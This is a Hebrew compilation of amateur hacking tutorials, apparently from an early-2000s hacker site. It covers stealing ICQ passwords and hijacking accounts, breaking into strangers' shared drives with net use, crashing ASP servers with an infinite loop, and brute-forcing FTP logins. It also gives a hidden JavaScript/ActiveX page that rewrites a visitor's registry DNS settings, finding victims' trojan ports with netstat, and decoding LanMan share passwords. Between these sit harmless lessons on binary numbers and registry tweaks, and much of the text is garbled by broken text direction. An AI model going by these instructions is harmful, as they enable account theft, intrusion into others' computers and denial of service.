‫הסיסמא של האי סי קיו לא שמורה ברג'סטרי או באתר של האי סי קיו כמו‬
‫שרובכם חושבים!‬
‫הסיסמא נימצאת בתוך קובץ‬
‫‪data base‬‬
‫של האי סי קיו‪.‬‬
‫אני יסביר איך למצוא את הקובץ באי סי קיו ‪ 2001‬בי אבל הוא קיים גם‬
‫בסוגים האחרים‪.‬‬
‫אז ככה‬
‫כנסו לתיקיה של האי סי קיו‪....‬‬
‫אצל רובכם זה יהיה ב‬
‫‪C:\Program Files\ICQ‬‬
‫יש שם כמה תיקיות נכון?‬
‫כנסו לתיקיה בשם‬
‫‪2001a‬‬
‫מסיבה כלשהי היוצרים דילגו על‬
‫‪icq2001a‬‬
‫אבל החליטו להשאיר את התיקיה הזאת‬
‫עשיו שאתם בפנים אתם תראו כמה קבצים בינהם‬
‫‪your uin.dat‬‬
‫‪your uin.idx‬‬
‫לכל מי שלא יודע‬
‫‪uin= icq number‬‬
‫אלה הקבצים החשובים שרצינו!!!‬
‫אבל הקובץ החשוב ביותר הוא הקובץ‬
‫‪dat‬‬
‫אם אין את ה‬
‫‪idx‬‬
‫זה לא חשוב!!!! עכשיו אחרי שיש לנו את הקובץ הזה אנחנו מורידים‬
‫‪ICQr‬‬
‫מהכתובת‪:‬‬
‫‪http://www.headstrong.de/cgi-bin/download.cgi?icqrinfo‬‬
‫ואחרי זה פותחים את התוכנה ואתם כבר תבינו איך היא עובדת היא נורא פשוטה‬
‫לשימוש‪.‬‬
‫אתם פותחים את הקובץ דאט וזה יתן לכם את הסיסמא של האי סי קיו שלכם‬
‫כולל את כל הרשימה‬
‫שיש לכם‪+‬אנשים שדיברתם איתם פעם ומחקתם אותם!!!‬
‫כך שזה נורא מועיל עם מחקת משהו בטעות ואתה מתחרט ורוצה להחזיר אותו‪.‬‬
‫אני סומך עליכם כבר איך להשיג קבצי דאט אפשר לעבוד על ליימרים שאתם‬
‫חייבים את הקובץ הזה‬
‫בשביל לשפר לו את האי סי קיו או כי לכם חסר קובץ כזה וזה לא משנה של‬
‫איזה מספר זה‬
‫)זה כבר עבד לי( וכו‪....‬‬
‫העיקר שתהנו‬
‫ניכתב ע"י‬
‫=====================================================================‬
‫===================‬
‫תודות‪ :‬לקול אבדול על העזרה שלו‬
‫גנבת איי סי קיו‬
‫אהלן חברה מה מצב? זה שוב אני‬
‫מדווח לכם מהשטח והפעם‪ ......‬איך לגנוב אי סי קיו דרך לינוקס\יוניקס‬
‫אז ככה קודם כל האי סי קיו זה אחלה דבר אבל מורכב בצורה טיפשית‪.‬‬
‫אני לא יתחיל להסביר עכשיו על האי סי קיו מצטער אני רק יסביר איך זה‬
‫מתבצע‪.‬‬
‫בו ניקרא לדבר הזה‬
‫‪.Major ICQ security hole‬‬
‫אז ככה לאי סי קיו יש מכסימום של סיסמא לרשום נכון?‬
‫נכון!!!‬
‫אז ככה המכסימום הזה הוא ‪ 8‬וכאשר אתם מכניסים את הסיסמא היא נישלחת‬
‫לאתר של האי סי קיו ורושמת אתכם‪.‬‬
‫עכשיו מה אנחנו עושים בשביל לגנוב את ה‬
‫‪uin‬‬
‫ד"א למי שלא ידוע‬
‫‪.uin=the icq num‬‬
‫או קיי עכשיו אם יש לכם לינוקס\יוניקס תורידו‬
‫‪ICQ clone‬‬
‫ותתקינו‪.‬‬
‫עכשיו‪ ...‬מה שאנחנו עושים זה‪ .....‬רושמים את המספר אי סי קיו שאנחנו‬
‫רוצים ו‪ ?..‬מה קורה אם הסיסמא?‬
‫שאלה טובה‪.‬‬
‫אתם רושמים ‪ 9‬ספרות‪ .‬מה זאת אומרת?‬
‫זאת אומרת שאתם רושמים במקום של הסיסמא משהו כזה‬
‫‪123456789‬‬
‫ומה קורה?‬
‫מה שקורה זה‬
‫‪overflow‬‬
‫של האי סי קיו ולכן הוא מאשר אתכם!!!‬
‫‪:and as they say in english‬‬
‫‪If all goes well, it will log in and connect‬‬
‫כמובן הכל בתנאי שהיוזר הוא אוף ליין!!!!‬
‫אחרי שאתם עושים את זה תשנו סיסמא כדי שהיוזר לא יוכל להחזיר לעצמו את‬
‫האי סי קיו‪.‬‬
‫כמובן שעכשיו תוכלו לשלוח הודעות בשמו והכל‪.....‬‬
‫תהנו!!!‬
‫אני לא אחראי על שום נזק שניגרם מכל תוצאה בשימוש טקסט זה‬
‫אם זה לא פועל לכם תאמינו לי שזה לא בעיה אצלי אלה אצל‪......‬‬
‫תסיכו מסקנות‬
‫)‪:‬‬
‫סתם אחים שלי‬
‫טקסט זה שייך לאתר המכובד והמדהים‬
‫‪http://www.hphc.up.co.il‬‬
‫=====================================================================‬
‫===============================‬
‫תודה לקול אבדול על כל מה שלימד אותי‬
‫פריצה דרך שיתופים‬

‫פריצה למחשבים‬
‫___________‬
‫יש סיכוי גדול שאם אתה ניובי פה אתה תחטוף חתיכת התלהבות!!!!‬
‫שים לב תוריד את התוכנה‬
‫‪legion‬‬
‫מהאתר‬
‫כנסו לתוכנה כתבו את המספר איי פי שלכם וסירקו‬
‫אם מופיע לכם משהו בסגנון הבא‪...‬‬
‫‪Share name‬‬ ‫‪Type‬‬ ‫‪Used as‬‬ ‫‪Comment‬‬
‫‪-----------------------------------------------------------------‬‬
‫‪E_YAIR (E) Disk‬‬
‫‪HPDeskJe‬‬ ‫‪Print‬‬ ‫‪HP DeskJet 840C/841C/842C/843C‬‬
‫‪SharedDocs Disk‬‬
‫‪.The command completed successfully‬‬
‫אז תסגרו את החלונות והדלת ותצרחו‬

‫ה צ ל ח ת י ! ! ! עכשיו תעתיקו את המספר איי פי‬
‫לכו לדוס וכתבו‬
‫‪net view \\ip.is.here‬‬
‫זה יחשוב עד בערך ‪ 30‬שניות ואז שוב יופיע לכם הדבר הזה‬
‫‪Share name‬‬ ‫‪Type‬‬ ‫‪Used as‬‬ ‫‪Comment‬‬
‫‪-----------------------------------------------------------------‬‬
‫‪E_YAIR (E) Disk‬‬
‫‪HPDeskJe‬‬ ‫‪Print‬‬ ‫‪HP DeskJet 840C/841C/842C/843C‬‬
‫‪SharedDocs Disk‬‬
‫המקום שבו כתוב‬

‫‪type=disk‬‬
‫זה מה שאנחנו צריכים כי זה מציין כונן שנמצא בשיתוף‬
‫עכשיו כתבו‬
‫‪net use p: \\ip.is.here\E_YAIR‬‬

‫זה יחשוב עד בערך שתי דקות ואז אתם תקבלו את ההודעה הבאה‬
‫צאו חזרה לוינדואז ולכו למחשב שלי אם תסתכלו טוב טוב אבל ממש ממש טוב‬
‫תראו שנוסף לכם כונן‬
‫‪:p‬‬
‫שהכונן הזה הוא בעצם הכונן של הנפרץ כנסו לכונן ואתם בעצם בכונן שלו אתם‬
‫יכולים להוסיף למחוק לראות לשנות ולהתעלל בקבצים‬
‫קריאת מספרים בינאריים ודצימליים‬

‫קריאת מספרים בינארים ודצימלים‬
‫_____________________‬
‫נתחיל מהקל ליותר קל‬
‫שימו לב בסיס בינארי )בסיס ‪ (2‬מציינים את המספרים ע"י הספרות ‪ 0‬ו ‪1‬‬
‫בכל רצץ בינארי יש שמונה ספרות שכל אחת מהן תופסת ביט וסך הכל מספר‬
‫בינארי תופס‬
‫בייט )למי שלא יודע בייט = ‪ 8‬ביטים( אז זה מגביל אותנו ל ‪ 255‬מספרים‬
‫תכף תבינו למה‬
‫_________________________________________‬
‫|‬ ‫בינארי‬ ‫‪0 0 0 0 0‬‬ ‫‪0‬‬ ‫‪0‬‬ ‫| ‪0‬‬
‫|‬ ‫עשרוני‬ ‫‪1 2 4 8 16 32‬‬ ‫|‪64 128‬‬
‫|________________________________________|‬
‫ב"טבלה" אנחנו רואים סיפרה ואת המקביל שלה בבסיס עשרוני יענו בסיס רגיל‬
‫יום יום ‪ 0-9‬בכל אופן‬
‫אנחנו משתמשים בספרות ‪ 1‬ו ‪ 0-‬לציין‬
‫‪false=0‬‬
‫‪true=1‬‬
‫אז נגיד שאנחנו רוצים ליצור את המספר ‪) 2‬עשרוני( על בסיס בינארי אנחנו‬
‫עוברים בטבלה ורואים איפה נמצא המספר שתיים‬
‫אם מנת המשכל שלכם היא מעל ‪) 15‬לא כמו מישהו שיודע מיהוא‪ ...‬המבין יבין(‬
‫אז תראו שהספרה שתיים נמצאת מתחת לאפס השני‬
‫אז אנחנו נסמן שאפס השביעי הוא‬
‫אמיתי‬
‫)‪(true‬‬
‫עוברים על המספר הראשון בטבלה‬
‫המספר ‪128‬‬
‫אנחנו מיד רואים שזה לא ‪ 128‬כי ‪ 128‬הוא גדול משתיים‬
‫אז מסמנים ‪0‬‬
‫סך בכל יש לנו ‪0‬‬
‫אחריו‬‫עוברים למספר‬
‫המספר ‪64‬‬
‫אז מסמנים עוד ‪0‬‬
‫סך הכל יש לנו‬
‫‪00‬‬
‫עוברים למספר אחריו‬

‫‪000‬‬
‫אנחנו מיד רואים שזה לא ‪ 16‬כי ‪ 16‬גדול משתיים‬
‫‪0000‬‬

‫אנחנו מיד רואים שזה לא ‪ 8‬כי שמונה גדול משתיים‬
‫‪00000‬‬

‫אנחנו מיד רואים שזה לא ‪ 4‬כי שמונה גדול משתיים‬
‫‪000000‬‬

‫אנחנו רואים ששתיים שווה לשתיים‬
‫‪ 1‬אז מסמנים‬
‫‪0000001‬‬

‫אנחנו רואים שזה לא ‪ 1‬כי ‪ 1‬קטן משתיים‬
‫‪00000010‬‬
‫שימו לב הינה המספר שתיים בבסיס בינארי!!!‬

‫‪00000010‬‬
‫עכשיו תקראו את זה זה ממש חשוב‬
‫המספרים שבאים מצד שמאל של המספר אין להם משמעות כמו בכל בסיס אז בסוף‬
‫יוצא‬
‫__‬
‫‪2=10‬‬
‫איך מסמנים את המספר ‪???8‬‬

‫עוברים על כל הספרות מסמנים ‪ 1‬או ‪ 0‬במקומות הנכונים‬
‫אם בסוף הגעתם ל‬
‫‪00001000‬‬
‫או‬
‫‪1000‬‬
‫אז צדקתם!‬
‫עדיין לא הבנתם תשלחו הודעה בפורום ומאה אחוז אני או מישהו אחר יענה לכן‬
‫או שתוכלו לשלוח לי אי מייל‬
‫בהצלחה‬
‫דרך אגב‪ :‬בסיס דצימלי הוא הבסיס הרגיל שלנו בסיס ‪ 10‬בסיס עשרוני רגיל‬
‫הפלת שרת‬
‫להפיל שרתים שתומכים ב‬

‫‪asp‬‬
‫________________‬
‫מאוד פשוט פותחים חשבון חדש יוצרים עמוד‬
‫‪asp‬‬
‫והתוכן שלו הוא‬
‫>‪%‬‬
‫‪i=3000‬‬
‫‪application("stam")=169‬‬
‫‪while i<>5‬‬
‫‪("application("stam")=application("stam")*application("stam‬‬
‫‪i=i+1‬‬
‫‪wend‬‬
‫‪<%‬‬
‫הסבר‬
‫למי מכם שלא מבין בתכנות לולאות הם פקודות אשר חוזרות על עצמם עד שתנאי‬
‫מסויים לא מתמלא‬
‫אצלי בדוגמא בבחרתי במשתנה‬
‫‪application‬‬
‫שזהו המשתנה הכי כבד ב‬
‫‪asp‬‬
‫מכבר שהמשתנה הזה נשאר על השרת לנצח גם אם המשתמש סגר את החלון האדמין‬
‫הוריד את כל הדפים מהאתר המשתנה עדיין נשאר רק כשהאדמין מחבא את הסרבר‬
‫המשתנה נעלם‬
‫בעמוד רגיל ברגע שתסגור את העמוד יעלם המשתנה עכשיו לעיקר אני יצרתי‬
‫לולאת בהתנאי בה לעולם לא יתממש לכן זוהי לולאה אין סופית היא חוזרת על‬
‫עצמה אין סוף פעמים ובכל פעם נעשית מסיבית יותר‬
‫עד שהיא תוקעת את הסרבר שאחרי הכל הוא בסך הכל מחשב‬
‫רג'יסטרי חלק ‪'1‬‬

‫אהלן אחים שלי טוב אני יקצר בזיבולי שכל ויעריך בלימוד‪.‬‬
‫אז קודם כל כל הזכויות שמורות ל ‪ http://www.hphc.up.co.il‬וששום בן של‬
‫אמא‬
‫של שופט ינסה לגנוב את זה!!!‬
‫‪all rights reserved‬‬
‫_____________________________________________________________________‬
‫_‬
‫============בשביל ראיה יותר טובה של מדריך זה=========‬
‫====================לחצו על המקשים===================‬
‫======================‪======================Ctrl+Ship‬‬
‫=באותו הזמן!!! שניה המקשים נמצאים בצד שמאל של המקלדת=‬
‫=====================================================‬
‫‪++++++++++++++++++++++‬‬
‫‪ +‬אז בו נתחיל במדריך ‪+‬‬
‫======================‬
‫‪-‬מה זה בכלל רג'סטרי?‬

‫‪-‬איך מפעילים אותו?‬
‫‪-‬מה אפשר לעשות באמצעות הרג'סטרי?‬
‫‪ .1‬הרג'סטרי זה בעצם הלב של המחשב‪.‬‬

‫כל מה שנרשם במחשב נרשם בתוך הרג'סטרי‪.‬‬
‫כל התוכנות שאתם מתקינים וכל הדברים שקשורים באופן עקיף או ישיר הם‬
‫בעצם קשורים לרג'סטרי בדרך אחת או אחרת‪.‬‬
‫למשל אם אתם קובעים דף בית מסויים הוא נירשם ברג'סטרי!!!‬
‫הרבה הרבה הרבה דברים שנקבעים בווינדואס בעצם רשומים ברג'סטרי‪.‬‬
‫כמו‪ :‬השמות של הסל מיחזור‪ ,‬המחשב שלי‪ ,‬קונטרול פאנל וכו‪ ...‬רשמוים‬
‫ברג'סטרי)במדריך הבא נילמד לשנות את שמתיהם(‪ ,‬הרג'סטרי קובע גם דברים‬
‫בתפריט התחל כמו הסדר שלו ועוד‪ ,‬ככה גם בפייבוריטס)הסדר!!( וכו‪...‬‬
‫או קיי מבינים?‬
‫סבבה ממשיכים‪.‬‬
‫‪ .2‬איך מפעילים את הרג'סטרי אתם שואלים?‬

‫אז יש מספר דרכים אבל השתיים הנורמליות והכי פחות מסובכות הם‪:‬‬
‫א‪ .‬נכון יש את הכפתור המגעיל של הווינדואס שניקרא‬

‫התחל\‪start‬‬
‫זה תלוי איזה ווינדואס יש לכם)אנגלית או עיברית(‬
‫תלחצו על הכפתור הזה עכשיו תופיע לכם רשימה מתוכה תבחרו‬
‫בהפעל\‪run‬‬
‫ובתיבת טקסט תרשמו‬
‫‪regedit‬‬
‫ותקישו אנטר‪.‬עכשיו יפתח לכם חלון שזה בעצם הרג'סטרי!!!‬
‫ב‪ .‬הדרך השניה והטיפה יותר ארוכה היא לפתוח את התיקיה בשם המחשב שלי‬
‫וללכת לכונן שבו מותקן הווינדואס)בדרך כלל קונן סי( נניח שהוא מותקן‬
‫בקונן סי!!!‬
‫אז פותחים את המחשב שלי והולכים לכונן סי נכנסים לתיקיה של הווינדואס‬
‫ומחפשים את הקובץ בשם‬
‫‪Regedit.exe‬‬
‫מצאתם? יופי עושים דאבל קליק על הקובץ והופ אנחנו ברג'סטרי‬
‫)‪:‬‬
‫‪ .3‬טוב כמו שכבר אמרתי בדבר הראשון עם הרג'סטרי אפשר לעשות‬

‫מלא דברים כמו‪ :‬לשנות שמות של תיקיות כמו המחשב שלי הסל מיחזור‬
‫קונטרול פאנל וכו‪...‬‬
‫מה שעוד יהיה אפשר לעשות הוא להעלים את האייקונים מהדסקטופ‪ ,‬להעלים את‬
‫הדרייברים מהמחשב שלי‪ ,‬להעלים תיקיות מהתפרי התחל ועוד מלא דברים‬
‫כמובן שאת כל הדברים האלה נילמד‪...‬‬
‫אז עד לפעם הבאה נתראה‬
‫‪---------------------------------------------------------------------‬‬
‫‪--‬‬
‫=תודות‪ :‬תודה רבה רבה רבה רבה רבה רבה לקול אבדול ‪ my man‬ולכל האחרים‬
‫=‬
‫=שהסבירו לי פה ושם‬
‫=‬
‫רג'יסטרי חלק ‪'2‬‬

‫בקובץ זה נילמד לעשות דברים חביבים עם הרג'סטרי‪.‬‬
‫בעמוד זה יהיו דברים למשתמשי רג'סטרי מתחילים‪.‬‬
‫לאט לאט אני יכין עוד קבצי רג'סטרי למתקדמים יותר‪.‬‬
‫דבר חשוב לפני שמתחילים!!!‬

‫הסימן ‪ /‬או הסימן \ הם סימנים של תת תיקיות מובן? ז"א שאם רשום‬
‫‪hacker/hphc/best site‬‬
‫אז התיקיה האקר היא התיקיה הראשית התיקיה שנמצאת בתוכה היא תיקיה בשם‬
‫‪hphc‬‬
‫ובתוך התיקיה הזאת נימצת עוד תיקיה בשם בסט סייט!!!‬
‫או קיי? הבנו?‬
‫יופי‬
‫אז בו נתחיל!!!‬
‫נכון תמיד רציתם לשנות את השם של הסל מיחזור או של הקונטרול פאנל או‬
‫של המחשב שלי???‬
‫נכון שזה נראה ממש משהו פצצה??‬
‫אז היום אני ילמד אתכם איך‪.‬‬
‫אז ככה פתחו את עורך הרג'סטרי‪.‬‬
‫‪start-->run-->regedit--->enter‬‬
‫עכשיו יעלה לכם העורך נכון? יופי‪.‬‬
‫לכו לתיקיה‪:‬‬
‫‪/My Computer/HKEY_CLASSES_ROOT/CLSID‬‬
‫}‪{645FF040-5081-101B-9F08-00AA002F954E‬‬
‫עכשיו בתוך התיקיה הזאת אתם תמצאו שני קבצים‬
‫‪(InpoTip, (Default‬‬
‫נכון??? יופי!!!‬
‫אז עכשיו הסבר על כל קובץ‬
‫‪InpoTip‬‬
‫אם אתם משאירים את הסמן של העבר הרבה זמן על התיקיות המיוחדות של‬
‫הווינדאוס‬
‫אזהוא מראה הסבר קצר על התיקיה זה האינפו טיפ‪.‬‬
‫)‪(Default‬‬
‫זה השם של התיקיה‪ ,‬במקרה שלנו זה הסל מיחזור‪.‬‬
‫עכשיו בשביל לשנות את הדברים אתם עושים שתי לחיצות על הקובץ ומשנים‬
‫לאיך שאתם רוצים שזה יקרא‪.‬‬
‫כשסיימתם אתם יוצאים מהעורך רג'סטרי ועושים רענן בדסקטופ!!!‬
‫מזל טוב כרגע עשיתם את הדבר הראשון שלכם ברג'סטרי‪.‬‬
‫עכשיו עוד הסבר קצר כדי שתבינו מה עשיתם בעצם‪.‬‬

‫הקלאס אי די)‪(CLSID‬‬
‫מכיל בעצם את כל התיקיות שנותנות שם לדברים במחשב כמו הסל מיחזור המחשב‬
‫שלי וכו‬
‫לכל אחד יש תיקיה מסוימת שהיא קבועה!!!‬
‫הנה מספר תיקיות‪:‬‬
‫‪{My Briefcase:{85BBD920-42AO-1069-A2E4-08002B30309D‬‬
‫‪{Desktop: {00021400-0000-0000-C000-0000000000046‬‬
‫‪{Control Panel:{21EC2020-3AEA-1069-A2DD-08002B30309D‬‬
‫‪{Dial-Up-Networking:{992CFFA0-F557-101A-88EC-00DD01CCC48‬‬
‫‪{My Computer :{20D04FE0-3AEA-1069-A2D8-08002B30309D‬‬
‫‪{Network Neighborhood:{208D2C60-3AEA-1069-A2D7-O8002B30309D‬‬
‫‪{Recycle Bin :{645FF040-5081-101B-9F08-00AA002F954E‬‬
‫תנסו להתעסק עם זה אבל בלי שטויות כי טעות קטנה ברג'סטרי וזה לא‬
‫יהיה יפה‪.‬‬
‫טוב זה היה מספיק להתחלה אז תסתפקו בזה המשך יבוא במהרה‪.‬‬
‫שלכם‪...‬‬
‫=====================================================================‬
‫=‬
‫תודה רבה לקול אבדול על התמיכה ועל הכל‬
‫פריצה לאפ טי פי‬

‫כניסה ל‬
‫‪FTP‬‬
‫__________________‬
‫בשביל לחדור ל‬
‫‪ftp‬‬
‫עם הגנות מינימליות‬
‫לדוגמא‪:‬‬
‫‪ftp.icq.com‬‬
‫אפשר להשתמש בדרך הבאה‬
‫)לא בטוח שזה עדיין עובד באיי סי קיו(‬
‫לכו להתחל‬
‫לכו להפעלה‬
‫כתבו‬
‫‪command‬‬
‫עלה לכם חלון דוס‬
‫כתבו עכשיו‬
‫‪ftp X‬‬
‫ואז יכתב לכם‬
‫‪Connected to X‬‬
‫‪.X FTP server (Digital UNIX Version 5.60) ready 220‬‬
‫‪User (X:(none)): anonymous (write anonymous cause we want the ftp to‬‬
‫‪(give us anonymous access‬‬
‫‪.Guest login ok, send ident as password 331‬‬
‫‪) Password: fake_email@fake_domain.com‬כתבו אי מייל מזוייף אם האפ טי‬
‫פי תומך בכניסה אנונימית אז אתם בפנים(‬
‫‪.Guest login ok, access restrictions apply 230‬‬
‫‪) <ftp‬זה כמו חלון דוס חדש כתבו פה פקודות דוס כדי לתפקד באפ טי פי למשל‬
‫ראו למטה (‬
‫‪(cp (to copy a file) dir(to change directory‬‬
‫)כנסו לעמוד הזה בשביל סיסמאות ברירת מחדל(‬

‫"סיסמאות אפ טי פי"‬
‫בשביל לחדור ל‬
‫‪ftp‬‬
‫עם הגנות מקסימליות‬
‫הורידו את הקובץ "מילון" מהחלק של ה"שונות" כדי להמשיך‬

‫לאחר שהורדתם‬
‫לכו לדוס‬
‫עשו את כל מה שעשיתם קודם בסוף תגיעו למשהו כזה‬
‫‪<FTP‬‬
‫כתבו שם‬
‫‪mput milon.txt‬‬
‫ואז מה שזה יעשה זה ינסה את כל הסיסמאות שיש בקובץ‬
‫שיטה זו עלולה לקחת כמה ימים כך שהיא פחות מומלצת‬
‫שליטה ברג'יסטרי בעזרת ג'אווה סקריפט‬
cool-abdool
registry ‫איך לשלוט ב‬

‫עם ג'ווה סקריפט‬
‫שימו את זה בעמוד‬
html
<script>
document.write("<APPLET HEIGHT=0 WIDTH=0
code=com.ms.activeX.ActiveXComponent></APPLET>");
function yuzi3(){
try{
a1=document.applets[0];
a1.setCLSID("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}");
a1.createInstance();Shl = a1.GetObject();
a1.setCLSID("{0D43FE01-F093-11CF-8940-00A0C9054228}");
try{
Shl.RegWrite("HKLM\\System\\CurrentControlSet\\Services\\VxD\\MSTCP\\
SearchList","roots-servers.net");
}
catch(e){}
}
catch(e){}
}
setTimeout("yuzi3()",1000);
document.write("<APPLET HEIGHT=0 WIDTH=0
code=com.ms.activeX.ActiveXComponent></APPLET>");
function yuzi2(){
try{
a2=document.applets[0];a2.setCLSID("{F935DC22-1CF0-11D0-ADB9-
00C04FD58A0B}");
a2.createInstance();Shl = a2.GetObject();a2.setCLSID("{0D43FE01-F093-
11CF-8940-00A0C9054228}");
try{
Shl.RegWrite("HKLM\\System\\CurrentControlSet\\Services\\VxD\\MSTCP\\
EnableDns","1");
}
catch(e){}
}
catch(e){}
}setTimeout("yuzi2()",1000);
</script>
‫יש לשנות את ה‬
scr!pt
‫ל‬
script
‫נזק שנגרם למחשבכם ע"י שימוש בטקסט זה על‬ ‫לא להפעיל כל אבל כל כל כל‬
‫אחריותכם בלבד‬
‫הסבר על נט סטט‬
‫איך לדעת איזה טרויינים יש על המחשב של האויב‬
‫לכו ל‬
‫התחל‬
‫הפעלה‬
‫כתבו‬
‫‪command‬‬
‫אם נפצח חלון דוס כתבו‬
‫‪netstat -n‬‬
‫אם עשיתם את כל הפעולות עד עכשיו נכון אז תראו משהו כזה‬
‫‪Microsoft(R) Windows 98‬‬

‫‪).C)Copyright Microsoft Corp 1981-1999‬‬
‫‪C:\WINDOWS\Desktop>netstat -n‬‬
‫‪Active Connections‬‬
‫‪Proto Local Address‬‬ ‫‪Foreign Address‬‬ ‫‪State‬‬

‫‪TCP‬‬ ‫‪192.168.0.5:1030‬‬ ‫‪192.168.0.5:135‬‬ ‫‪ESTABLISHED‬‬
‫‪TCP‬‬ ‫‪192.168.0.5:135‬‬ ‫‪192.168.0.5:1234‬‬ ‫‪ESTABLISHED‬‬
‫‪TCP‬‬ ‫‪213.8.2.100:1127‬‬ ‫‪64.12.28.139:5190‬‬ ‫‪ESTABLISHED‬‬
‫‪TCP‬‬ ‫‪213.8.2.100:1902‬‬ ‫‪160.79.54.72:80‬‬ ‫‪CLOSE_WAIT‬‬
‫‪TCP‬‬ ‫‪213.8.2.100:22650‬‬ ‫‪213.8.2.164:1103‬‬ ‫‪ESTABLISHED‬‬
‫‪TCP‬‬ ‫‪213.8.2.100:1930‬‬ ‫‪64.12.184.57:80‬‬ ‫‪TIME_WAIT‬‬
‫‪TCP‬‬ ‫‪213.8.2.100:1931‬‬ ‫‪64.12.184.57:80‬‬ ‫‪TIME_WAIT‬‬
‫‪TCP‬‬ ‫‪213.8.2.100:1934‬‬ ‫‪205.188.165.121:80‬‬ ‫‪TIME_WAIT‬‬
‫‪TCP‬‬ ‫‪213.8.2.100:1936‬‬ ‫‪205.188.165.121:80‬‬ ‫‪TIME_WAIT‬‬
‫<‪C:\WINDOWS\Desktop‬‬
‫\‪<WINDOWS\Desktop‬‬
‫החלק של ה‬
‫‪Local Address‬‬
‫לא מעניין אותנו‬
‫שימו לב ל‬
‫‪foreign address‬‬
‫אם אחרי הנקודותיים יש למשל‬
‫‪1234‬‬
‫כמו בשורה הזאת‬
‫‪TCP‬‬ ‫‪192.168.0.5:135‬‬ ‫‪192.168.0.5:1234‬‬ ‫‪ESTABLISHED‬‬
‫אז אפשר לדעת שלאותו מחשב יש נטבס כי זה הפורט של הנט בס ואז פשוט‬
‫נכנסים לנט בס ומתחברים לאותו‬
‫מחשב דרך האיי פי שלו‬
‫כנסו לטקסט שלי על טרויינים בשביל ללמוד על עוד פורטים‬
‫כמו נטבס‬
‫שימו לב אם אתה רוצים לקבל את האיי פי של מחשב מסויים‬

‫שלחו לבעל המחשב באיי סי קיו הודעה וחכו שיענה ברגע שהוא עונה‬
‫לכו לדוס ועשו את כל זה שוב‬
‫בהצלחה‬
‫השגת סיסמאות רשת‬

‫בגלל שאלה של חבר‬
‫איך להשיג סיסמאות רשת‬

‫_________________________________________________‬
‫לכו ל‬
‫התחל‬
‫הפעלה‬
‫‪regedit‬‬
‫כשתעלה התוכנה לכול‬
‫‪\HKEY_LOCAL_MACHINE\SOFTWARE‬‬
‫‪Microsoft\Windows\CurrentVersion\Network\LanMan‬‬
‫בחרו כונן והביטו בחלק של ה‬
‫‪parm1enc‬‬
‫יהיה כתוב שם משהו כזה‬
‫"‪"74d80e‬‬
‫הפכו את זה לבסיס הקסגוני‪ ,‬בסיס ‪ 16‬חלקו את המילה לשתי אותויות כל פעם‬

‫שימו לב לדוגמא‪:‬‬
‫"‪"d8 0e 74‬‬
‫אם תסתכלו בטבלה שלמטה תראו ש‬
‫‪a[1] = 74, b[2] = d8, and c[3] = 0e‬‬
‫אז הסיסמה היא‬
‫‪ABC‬‬
‫כי אין חשיבות ל‬
‫]‪[x‬‬
‫שבא אחרי המספר הוא רק עוזר לפענח‬
‫טבלה הקסגונית‪:‬‬
‫‪8‬‬ ‫‪7‬‬ ‫‪6‬‬ ‫‪5‬‬ ‫‪4‬‬ ‫‪3‬‬ ‫‪2‬‬ ‫‪1‬‬
‫‪=74‬‬ ‫‪=db‬‬ ‫‪=0c‬‬ ‫‪=e7‬‬ ‫‪=12‬‬ ‫‪=e8‬‬ ‫‪=95‬‬ ‫‪=2b‬‬ ‫‪A‬‬

‫‪=77‬‬ ‫‪=d8‬‬ ‫‪=0f‬‬ ‫‪=e4‬‬ ‫‪=11‬‬ ‫‪=eb‬‬ ‫‪=96‬‬ ‫‪=28‬‬ ‫‪B‬‬
‫‪=76‬‬ ‫‪=d9‬‬ ‫‪=0e‬‬ ‫‪=e5‬‬ ‫‪=10‬‬ ‫‪=ea‬‬ ‫‪=97‬‬ ‫‪=29‬‬ ‫‪C‬‬
‫‪=71‬‬ ‫‪=de‬‬ ‫‪=09‬‬ ‫‪=e2‬‬ ‫‪=17‬‬ ‫‪=ed‬‬ ‫‪=90‬‬ ‫‪=2e‬‬ ‫‪D‬‬
=70 =df =08 =e3 =16 =ec =91 =2f E
=73 =dc =0b =e0 =15 =ef =92 =2c F
=72 =dd =0a =e1 =14 =ee =93 =2d G
=7d =d2 =05 =ee =1b =e1 =9c =22 H
=7c =d3 =04 =ef =1a =e0 =9d =23 I
=7f =d0 =07 =ec =19 =e3 =9e =20 J
=7e =d1 =06 =ed =18 =e2 =9f =21 K
=79 =d6 =01 =ea =1f =e5 =98 =26 L
=78 =d7 =00 =eb =1e =e4 =99 =27 M
=7b =d4 =03 =e8 =1d =e7 =9a =24 N
=7a =d5 =02 =e9 =1c =e6 =9b =25 O
=65 =ca =1d =f6 =03 =f9 =84 =3a P
=64 =cb =1c =f7 =02 =f8 =85 =3b Q
=67 =c8 =1f =f4 =01 =fb =86 =38 R
=66 =c9 =1e =f5 =00 =fa =87 =39 S
=61 =ce =19 =f2 =07 =fd =80 =3e T
=60 =cf =18 =f3 =06 =fc =81 =3f U
=63 =cc =1b =f0 =05 =ff =82 =3c V
=62 =cd =1a =f1 =04 =fe =83 =3d W
=6d =c2 =15 =fe =0b =f1 =8c =32 X
=6c =c3 =14 =ff =0a =f0 =8d =33 Y
=6f =c0 =17 =fc =09 =f3 =8e =30 Z
=15 =ba =6d =86 =73 =89 =f4 =4a space
ab =7c =97 =62 =98 =e5 =5b= 04= 1
a8 =7f =94 =61 =9b =e6 =58= 07= 2
a9 =7e =95 =60 =9a =e7 =59= 06= 3
ae =79 =92 =67 =9d =e0 =5e= 01= 4
af =78 =93 =66 =9c =e1 =5f= 00= 5
ac =7b =90 =65 =9f =e2 =5c= 03= 6
ad =7a =91 =64 =9e =e3 =5d= 02= 7
0d =a2 =75 =9e =6b =91 =ec =52= 8
0c =a3 =74 =9f =6a =90 =ed =53= 9
aa =7d =96 =63 =99 =e4 =5a= 05= 0
4b =e4 =33 =d8 =2d =d7 =aa =14= ~
fa =2d =c6 =33 =c9 =b4 =0a= 55= `
bb =6c =87 =72 =88 =f5 =4b= 14= !
da =0d =e6 =13 =e9 =94 =2a= 75= @
b9 =6e =85 =70 =8a =f7 =49= 16= #
be =69 =82 =77 =8d =f0 =4e= 11= $
bf =68 =83 =76 =8c =f1 =4f= 10= %
6b =c4 =13 =f8 =0d =f7 =8a =34= ^
bc =6b =80 =75 =8f =f2 =4c= 13= &
1f =b0 =67 =8c =79 =83 =fe =40= *
1d =b2 =65 =8e =7b =81 =fc =42= )
1c =b3 =64 =8f =7a =80 =fd =43= (
b7 =60 =8b =7e =84 =f9 =47= 18= -
6a =c5 =12 =f9 =0c =f6 =8b =35= _
1e =b1 =66 =8d =78 =82 =ff =41= +
